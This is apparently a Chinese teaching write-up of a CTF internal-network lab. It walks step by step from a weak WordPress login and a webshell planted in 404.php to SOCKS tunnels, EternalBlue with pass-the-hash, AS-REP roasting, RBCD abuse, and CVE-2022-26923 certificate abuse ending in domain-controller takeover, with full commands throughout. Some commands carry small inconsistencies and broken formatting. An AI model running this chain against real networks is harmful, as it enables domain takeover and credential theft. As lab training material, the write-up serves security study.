网鼎杯半决赛内网渗透靶场实战教学文档<\/h1>

靶场概述<\/h2>
本靶场为2022年第三届网鼎杯决赛内网靶场的复盘环境，包含4个flag分布于不同靶机。通过该靶场可以学习内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术，特别是域环境核心认证机制的理解。<\/p>

前期信息收集<\/h2>

初始访问<\/h3>

给定IP地址：39.101.173.234<\/li>
识别为WordPress 6.4.3框架<\/li>
后台地址：\/wp-admin\/<\/li>

使用弱口令登录：admin\/123456<\/li> <\/ol>

获取Webshell<\/h3>

修改404.php文件：\/wp-content\/themes\/twentytwentyone\/404.php<\/li>
使用蚁剑连接获取靶标权限<\/li>

在根目录获取第一个flag<\/li> <\/ol>

建立交互式Shell<\/h3>

python3 -c 'import pty; pty.spawn("\/bin\/bash")'<\/span>
<\/span><\/span>export SHELL=<\/span>bash
<\/span><\/span>export TERM=<\/span>xterm-256color
<\/span><\/span>Ctrl-Z
<\/span><\/span>stty raw -echo;fg
<\/span><\/span>reset
<\/span><\/span><\/code><\/pre>建立隧道<\/h3>
FRP隧道配置：<\/strong><\/p>

服务端(Kali)：
bindPort<\/span> =<\/span> 7000<\/span>
<\/span><\/span><\/code><\/pre><\/li>
客户端(靶机)：
serverAddr<\/span> =<\/span> "出网机"<\/span>
<\/span><\/span>serverPort<\/span> =<\/span> 7000<\/span>
<\/span><\/span>[[proxies]]<\/span>
<\/span><\/span>name<\/span> =<\/span> "socks5"<\/span>
<\/span><\/span>type<\/span> =<\/span> "tcp"<\/span>
<\/span><\/span>remotePort<\/span> =<\/span> 6001<\/span>
<\/span><\/span>[proxies.plugin]<\/span>
<\/span><\/span>type<\/span> =<\/span> "socks5"<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
内网渗透<\/h2>
内网扫描<\/h3>
上传fscan工具扫描内网，获取以下信息：<\/p>
172.22.15.26 - 当前靶标地址
172.22.15.24 - 可能存在永恒之蓝漏洞
172.22.15.35 - XIAORANG\XR-0687
172.22.15.13 - 域控 XR-DC01.xiaorang.lab (Windows Server 2016 Standard 14393)
172.22.15.18 - XR-CA.xiaorang.lab (Windows Server 2016 Standard 14393)
<\/code><\/pre>
NPS隧道搭建<\/h3>

Kali作为nps服务端<\/li>
靶标作为npc客户端<\/li>
建立socks5代理(端口3333)<\/li>
<\/ol>
永恒之蓝漏洞利用<\/h3>

发现172.22.15.24存在永恒之蓝漏洞<\/li>
使用proxychains配合socks5代理进行攻击<\/li>
获取系统hash进行攻击：<\/li>
<\/ol>
proxychains psexec.py administrator@172.22.15.24 -hashes ':0e52d03e9b939997401466a0ec5a9cbc'<\/span> -codec gbk
<\/span><\/span><\/code><\/pre>
在桌面找到第二个flag<\/li>
<\/ol>
域渗透技术<\/h2>
AS-REP Roasting攻击<\/h3>

使用GetUserSPNs.py寻找未做Kerberos预身份认证的用户<\/li>
获取hash：<\/li>
<\/ol>
proxychains GetNPUsers.py -dc-ip 172.22.15.13 -usersfile user.txt xiaorang.lab\/
<\/span><\/span><\/code><\/pre>
使用hashcat爆破：<\/li>
<\/ol>
hashcat -m 18200<\/span> --force -a 0<\/span> '$krb5asrep$...'<\/span> rockyou.txt
<\/span><\/span><\/code><\/pre>
获取凭据：<\/li>
<\/ol>
lixiuying@xiaorang.lab\/winniethepooh
huachunmei@xiaorang.lab\/1qaz2wsx
<\/code><\/pre>
基于资源的约束性委派(RBCD)攻击<\/h3>

使用PowerView枚举用户DACL：<\/li>
<\/ol>
Import-Module .\PowerView.ps1
<\/span><\/span>Get-DomainUser -Identity lixiuying -Properties objectsid
<\/span><\/span>Get-DomainObjectAcl -Identity XR-0687 | ?{$_.SecurityIdentifier -match<\/span> "S-1-5-21..."<\/span>}
<\/span><\/span><\/code><\/pre>
使用Powermad添加机器用户：<\/li>
<\/ol>
$Password = ConvertTo-SecureString 'Qwer1234'<\/span> -AsPlainText -Force
<\/span><\/span>New-MachineAccount -MachineAccount "HACK01"<\/span> -Password $($Password) -Domain "xiaorang.lab"<\/span> -DomainController "XR-DC01.xiaorang.lab"<\/span> -verbose
<\/span><\/span><\/code><\/pre>
配置资源委派：<\/li>
<\/ol>
$A = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-3745972894-1678056601-2622918667-1147)"<\/span>
<\/span><\/span>$SDBytes = New-Object byte[] ($A.BinaryLength)
<\/span><\/span>$A.GetBinaryForm($SDBytes, 0)
<\/span><\/span>Get-DomainComputer XR-0687 | Set-DomainObject -Set @{'msDS-AllowedToActOnBehalfOfOtherIdentity'<\/span>=$SDBytes} -Verbose
<\/span><\/span><\/code><\/pre>
使用SharpAllowedToAct工具：<\/li>
<\/ol>
SharpAllowedToAct.exe -m HACK01 -p P@
<\/span><\/span>$$
<\/span><\/span>w0rd -t XR-0687 -a XR-DC01.xiaorang.lab -d xiaorang.lab
<\/span><\/span><\/code><\/pre>
获取ST票据：<\/li>
<\/ol>
proxychains impacket-getST xiaorang.lab\/'hacker1$'<\/span>:'Admin@123'<\/span> -dc-ip 172.22.15.13 -spn cifs\/XR-0687.xiaorang.lab -impersonate Administrator
<\/span><\/span><\/code><\/pre>
导入票据并横向移动：<\/li>
<\/ol>
export KRB5CCNAME=<\/span>Administrator.ccache
<\/span><\/span>proxychains -q impacket-psexec -k -no-pass -dc-ip 172.22.15.13 administrator@XR-0687.xiaorang.lab -codec gbk
<\/span><\/span><\/code><\/pre>CVE-2022-26923证书服务漏洞利用<\/h2>

使用Certipy枚举可利用的证书模板：<\/li>
<\/ol>
proxychains certipy find -u 'lixiuying@xiaorang.lab'<\/span> -p 'winniethepooh'<\/span> -dc-ip 172.22.15.13 -vulnerable -stdout
<\/span><\/span><\/code><\/pre>
创建机器用户：<\/li>
<\/ol>
proxychains -q certipy account create -user 'spring$'<\/span> -pass 'Admin@123'<\/span> -dns XR-DC01.xiaorang.lab -dc-ip 172.22.15.13 -u lixiuying -p 'winniethepooh'<\/span>
<\/span><\/span><\/code><\/pre>
请求证书：<\/li>
<\/ol>
proxychains -q certipy req -u 'spring$@xiaorang.lab'<\/span> -p 'Admin@123'<\/span> -ca 'xiaorang-XR-CA-CA'<\/span>
<\/span><\/span><\/code><\/pre>
转换证书格式：<\/li>
<\/ol>
openssl pkcs12 -in xr-dc01.pfx -nodes -out test.pem
<\/span><\/span>openssl rsa -in test.pem -out test.key
<\/span><\/span>openssl x509 -in test.pem -out test.crt
<\/span><\/span><\/code><\/pre>
使用PassTheCert工具：<\/li>
<\/ol>
proxychains python3 passthecert.py -action whoami -crt test.crt -key test.key -domain xiaorang.lab -dc-ip 172.22.15.13
<\/span><\/span>proxychains python3 passthecert.py -action write_rbcd -crt test.crt -key test.key -domain xiaorang.lab -dc-ip 172.22.15.13 -delegate-to 'XR-DC01$'<\/span> -delegate-from 'spring$'<\/span>
<\/span><\/span><\/code><\/pre>
获取ST票据并接管域控：<\/li>
<\/ol>
proxychains -q impacket-getST xiaorang.lab\/'spring$'<\/span>:'Admin@123'<\/span> -dc-ip 172.22.15.13 -spn cifs\/XR-DC01.xiaorang.lab -impersonate Administrator
<\/span><\/span>export KRB5CCNAME=<\/span>Administrator@cifs_XR-DC01.xiaorang.lab@XIAORANG.LAB.ccache
<\/span><\/span>proxychains -q impacket-psexec -k -no-pass -dc-ip 172.22.15.13 administrator@XR-DC01.xiaorang.lab -codec gbk
<\/span><\/span><\/code><\/pre>总结<\/h2>
本靶场涵盖了从外网渗透到内网横向移动的完整攻击链，重点技术包括：<\/p>

WordPress漏洞利用<\/li>
内网代理隧道建立(FRP\/NPS)<\/li>
永恒之蓝漏洞利用<\/li>
AS-REP Roasting攻击<\/li>
基于资源的约束性委派(RBCD)攻击<\/li>
CVE-2022-26923证书服务漏洞利用<\/li>
<\/ol>
通过该靶场练习，可以全面掌握域环境渗透的核心技术要点。<\/p>